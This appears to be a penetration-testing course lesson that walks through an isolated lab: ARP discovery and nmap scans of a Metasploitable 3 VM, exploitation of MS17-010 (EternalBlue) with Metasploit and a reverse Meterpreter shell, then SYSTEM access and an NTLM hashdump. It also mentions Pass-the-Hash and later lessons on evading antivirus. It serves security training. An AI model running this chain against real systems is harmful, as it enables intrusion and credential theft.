Saltar al contenido principal

Introduction & Kali — Guided walkthrough

Enough theory. We build the lab, we scan, we get a shell. You are going to watch the first machine fall with your own eyes. Then, in the lab exercise, you will do it again on your own.

Reminder — closed lab, only

Every command in this lesson runs between two VMs on your own workstation, on a network isolated from the internet and the LAN. None of them should reach outside. If you cannot guarantee isolation, stop here and go read the "Isolated network" section below first.

What you will be able to do after this lesson​

  • Build an attacker + victim lab in thirty minutes.
  • Discover the victim without knowing its IP in advance.
  • Read the output of nmap without guessing — know what each column says.
  • Get a first shell with Metasploit on a historic flaw (EternalBlue, MS17-010).
  • Understand what a piece of evidence usable in a report looks like.

The setup​

Two VMs, one single rule: they only talk to each other.

MachineRoleAddress in the lab
Kali LinuxAttacker workstation. That is you.10.10.10.5
Metasploitable 3 (Windows)Deliberately vulnerable target.Unknown at first, somewhere in 10.10.10.0/24.

Metasploitable 3 is the official training machine published by Rapid7 (the maker of Metasploit). It is built to be destroyed. You can also use an unpatched Windows 7 with SMBv1 enabled.


Step 0 — The isolated network (mandatory)​

In VirtualBox: File → Host Network Manager → Create. Check DHCP disabled, set the host to 10.10.10.1/24.

In both VMs: Settings → Network → Adapter 1 → Host-only Adapter, pick the network you created.

Verification (on Kali):

ip -brief address

Expected output:

lo               UNKNOWN        127.0.0.1/8
eth0 UP 10.10.10.5/24

A ping 8.8.8.8 must fail:

From 10.10.10.5 icmp_seq=1 Destination Host Unreachable

Good. If the ping goes through, your lab is not isolated — fix it before you continue.


Step 1 — Find the target (ARP scan)​

You do not know the victim's IP. You will not ask for it: we hunt it down.

sudo netdiscover -r 10.10.10.0/24 -P

Typical output after 20 seconds:

 Currently scanning: Finished!   |   Screen View: Unique Hosts

IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------
10.10.10.1 0a:00:27:00:00:0a 1 42 Cadmus Computer Systems
10.10.10.12 08:00:27:c3:5f:1e 1 42 PCS Systemtechnik GmbH

Reading it:

  • 10.10.10.1 is your VirtualBox host (ignore it).
  • 10.10.10.12 is the target. The vendor PCS Systemtechnik is the VirtualBox signature — so it is indeed a VM.

Note the IP. It is yours for the rest of the walkthrough.

Definition — ARP, MAC, and why netdiscover works without any authorization

On a local network, two machines that want to talk need two addresses. The IP address belongs to the Internet Protocol, like 10.10.10.12. The MAC address, burned into the network card, belongs to the physical layer, like 08:00:27:c3:5f:1e. IP tells the network who; MAC tells it through where.

How does the first translate into the second? That is the job of ARP, Address Resolution Protocol. When Kali wants to send a packet to 10.10.10.12 but does not yet know its MAC, it broadcasts to the whole network the question "who has 10.10.10.12?". The relevant machine answers with its MAC; Kali keeps the mapping in a cache for a few minutes.

netdiscover exploits exactly that mechanism, sweeping the 10.10.10.0/24 range with ARP requests. It is extremely quiet on the logging side — most systems do not record ARP requests — it does not cross routers, and it works even when a firewall blocks ping. In return, it stops being useful the moment you leave the same network segment: beyond the router, you fall back on a classic IP scan.


Step 2 — Scan the ports (nmap)​

Do not jump straight into an nmap -A --script=vuln 10.10.10.12. We move in layers, from the quietest to the noisiest.

2a. Open ports, nothing else​

nmap -sS -Pn -p- --min-rate 2000 10.10.10.12 -oN scan-ports.txt
  • -sS: SYN scan. We send the first TCP packet, read the reply, and never finish the handshake. Fast, fewer traces than a full scan.
  • -Pn: do not ping first — the target may ignore ICMP.
  • -p-: all 65,535 ports, not just the default 1000.
  • --min-rate 2000: speed it up a bit (do not do this in production).
  • -oN: readable output to a file, for your report.
Definition — the TCP handshake, and why the SYN scan cuts it short

A normal TCP connection opens in three exchanges, the three-way handshake. The client sends a packet flagged SYN, synchronize; the server answers SYN-ACK, synchronized and acknowledged; the client wraps up with ACK, received. The connection is open, data can flow.

Nmap's SYN scan, also called half-open, sends the first SYN and observes the response. If the port is open, it receives SYN-ACK: it concludes that someone is listening and cuts the connection with a RST instead of the expected ACK. If the port is closed, it receives RST right away. If a firewall blocks, it receives nothing.

Two practical consequences. The connection never completes, so it often does not show up in the target application's logs — only the operating system's kernel sees it go by. And the scan is fast, because it saves the third packet and the shutdown. It is the default scan as soon as you have root rights, precisely because you need root to forge half-baked TCP packets.

Output excerpt:

PORT      STATE SERVICE
22/tcp open ssh
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
3389/tcp open ms-wbt-server
4848/tcp open appserv-http
8080/tcp open http-proxy

Reading it:

  • 22, 80, 3389: SSH, web, RDP — the classic trio.
  • 445 + 139: Windows file sharing (SMB). This is the port we care about. SMB has historically been a mine of flaws.
  • 3306: MySQL exposed. Worth noting for later.

2b. Service versions​

Now we ask each service to introduce itself:

nmap -sV -p 22,80,135,139,445,3389,8080 10.10.10.12 -oN scan-versions.txt

Key excerpt:

PORT    STATE SERVICE       VERSION
80/tcp open http Microsoft IIS httpd 7.5
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

Translation: Windows Server 2008 R2 with SMB listening. Windows Server 2008 R2 = release date 2009 = jackpot. An OS of that generation, if it has not been patched, is vulnerable to MS17-010 (exploit name: EternalBlue), the flaw published by the Shadow Brokers leak in 2017.

2c. Confirm the vulnerability (NSE script)​

nmap --script smb-vuln-ms17-010 -p 445 10.10.10.12

Expected output:

| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143

The word VULNERABLE is in capitals for a good reason. The machine is ours. All that is left is to act.


Step 3 — Take control with Metasploit​

Metasploit is a framework. You load a module (the exploit), you give it its options (the target), you run it.

Definition — Metasploit is not a tool, it is a framework

A tool, strictly speaking, does one thing. Nmap scans, John the Ripper cracks hashes, curl transfers a file. Metasploit does nothing on its own: it is a framework that gathers and exposes more than two thousand third-party attack modules, from the BSD kernel of the early 2000s to the Log4Shell vulnerability of 2021.

The value of the framework is not the quantity, it is the uniformity. Whether the module targets SMB on Windows or a PHP CMS, you always use the same commands — use, show options, set, exploit. You always pick a payload from the same list. You always manage open sessions with sessions -l. That regularity, invisible to a beginner, is what makes Metasploit indispensable the day you leave the single-exploit world and start chaining on a real engagement.

Two limits to keep in mind. Many antivirus products flag unmodified Metasploit payloads on sight, because their signatures are public and old; module 8 teaches how to obfuscate them. And an exploit that exists as a standalone script is not always packaged inside Metasploit — in that case you run it by hand, outside the framework.

msfconsole -q

-q suppresses the ASCII banner (that everyone has seen 500 times).

In the msf6 > console:

search ms17-010

Output:

   #  Name                                      Rank     Description
- ---- ---- -----------
0 exploit/windows/smb/ms17_010_eternalblue average MS17-010 EternalBlue
1 auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection

We take number 0:

use 0
show options

Metasploit shows the parameters. Only three to set:

set RHOSTS 10.10.10.12
set LHOST 10.10.10.5
set LPORT 4444
  • RHOSTS — the victim.
  • LHOST — your Kali (where the shell will connect back).
  • LPORT — the listening port on your side.
Definition — the payload, the stager, and why the connection comes from the target

An exploit reads in two parts. The vulnerability is the flaw that lets you get arbitrary code to run on the target. The payload is that code — what the target will do once you have made it execute something. The first gets you in, the second decides what happens once inside.

The choice of windows/x64/meterpreter/reverse_tcp is worth unpacking. windows/x64: the payload is a 64-bit Windows binary. meterpreter: not a plain shell, but a full in-memory agent covered below. reverse_tcp: the target opens an outbound connection to Kali instead of waiting for an inbound one. That is the practical key of the model: most corporate firewalls inspect inbound traffic and let outbound leave without much scrutiny, so a connection from the target to an external host has a real chance of getting through.

One last useful detail: so-called staged payloads like this one are not sent as one block. Metasploit first sends a small program, the stager, whose only job is to reach out to Kali to download the real payload — Meterpreter — and load it into memory. That shrinks the initial injected code, which helps for exploits that leave you only a few hundred bytes to work with.

We launch:

exploit

Output (the lines that matter):

[*] Started reverse TCP handler on 10.10.10.5:4444
[*] 10.10.10.12:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.12:445 - Host is likely VULNERABLE to MS17-010!
[*] 10.10.10.12:445 - Connecting to target for exploitation.
[+] 10.10.10.12:445 - Connection established for exploitation.
[*] 10.10.10.12:445 - Sending final SMBv1 buffers.
[*] 10.10.10.12:445 - Sending last fragment of exploit packet!
[*] 10.10.10.12:445 - Receiving response from exploit packet
[+] 10.10.10.12:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending stage (200262 bytes) to 10.10.10.12
[*] Meterpreter session 1 opened (10.10.10.5:4444 -> 10.10.10.12:49670)

meterpreter >

That meterpreter > changes everything. You are in.

Definition — Meterpreter, the agent you do not see going by

Meterpreter, short for meta-interpreter, is an attack agent designed by Metasploit. It differs from an ordinary shell on three points worth remembering.

It never touches disk. The target's shell opens, but Meterpreter is loaded entirely in memory, inside the process the exploit has already compromised. A classic antivirus that scans the file system will find nothing.

It speaks an encrypted binary protocol to Kali, not clear-text commands. What you type on the attacker side is translated into function calls; what the target returns is packaged before transmission. A network analyst capturing traffic sees an encrypted stream, not readable commands.

It exposes capabilities an ordinary shell does not — screenshots, dumping the system's hashes, file transfer, migrating to another process, listening to the microphone. These are functions written once by the authors, available regardless of the target system, which explains the consistency of vocabulary between very different modules.

Meterpreter is old, and well known to defenders. Modern EDR products recognize it, especially when it migrates between processes or fires certain system calls in bursts. That is why module 8 teaches how to hide it, and why professional red teams often prefer newer agents like Sliver or Havoc.


Step 4 — Confirm, and take the evidence​

Check who you are:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

NT AUTHORITY\SYSTEM. The highest account on Windows. Not administrator: above it. You are the system itself.

Check where you are:

meterpreter > sysinfo
Computer : METASPLOITABLE3
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows

And take a piece of evidence you can paste into the report:

meterpreter > screenshot
Screenshot saved to: /home/kali/gGpJKlmA.jpeg

Open the file: the victim's desktop, with the timestamp. That is your proof of pwn.

For fun (and to illustrate impact):

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::

The NTLM hashes of the local accounts. You will not crack them here — that is the subject of module 9. Just holding them is enough for the report.

Definition — the NTLM hash, what we just retrieved

An operating system never stores passwords in clear text: it stores hashes, the output of a one-way mathematical function applied to the password. From the hash you cannot recover the password; from the password you always get the same hash. That is how you can verify an input without ever keeping the original.

Windows uses the NTLM hash, derived from the password through MD4. Each line of the earlier output reads as follows:

Administrator : 500 : aad3b435b51404eeaad3b435b51404ee : e02bc503339d51f71d913c245d35b50b : : :

Name, numeric account ID, LM hash — obsolete, filled with zeros in modern configurations — then the NT hash itself. These hashes are not salted, which makes them attackable through precomputed tables or brute force, as you will see in module 9.

Two properties to keep in mind starting today. That hash is enough to impersonate the account on other Windows machines on the same network, without ever needing to know the password: this is the Pass-the-Hash attack. And the local Administrator account's hash is often the same across every machine of an estate cloned from the same image — a single stolen hash can therefore open the entire estate.

Close cleanly:

meterpreter > exit
[*] Shutting down Meterpreter...

What just happened, as a mental picture​

  1. Two VMs on a closed network.
  2. netdiscover found the target.
  3. nmap listed the open doors, then the services behind them.
  4. An nmap script pointed at the exploitable flaw.
  5. Metasploit delivered the exploit and pulled back the shell.
  6. In four commands, you are SYSTEM, with screenshots and hashes.

This is exactly the sequence we will run thirteen times, in different variants, all the way to the end of the course.


Where it goes wrong, and why​

  • netdiscover finds nothing. Your two VMs are not on the same host-only network. Check the settings on both VMs.
  • nmap says filtered everywhere. A firewall (Windows Defender Firewall) is intercepting. On Metasploitable, disable the VM's firewall; on a real target, switch technique (module 4).
  • The exploit returns Exploit aborted due to failure: no-target. The target is not 2008 R2, or SMBv1 is disabled. Rerun nmap --script smb-vuln-ms17-010. If NOT VULNERABLE, switch flaw.
  • The meterpreter session dies in 2 seconds. Antivirus. On this module, there is none. On a real target, we move to obfuscated payloads (module 8).

Going further, right now​

Rerun the same sequence, but with the variant:

nmap -A -p 445 10.10.10.12

-A combines OS detection, version detection, default scripts, and traceroute. It is the noisy scan. Compare the output with the layered scan — you will see that the same information reaches you at once, but that an IDS would have seen it coming from a mile away.

That is the whole point of the rest of the course: the same thing, but quietly.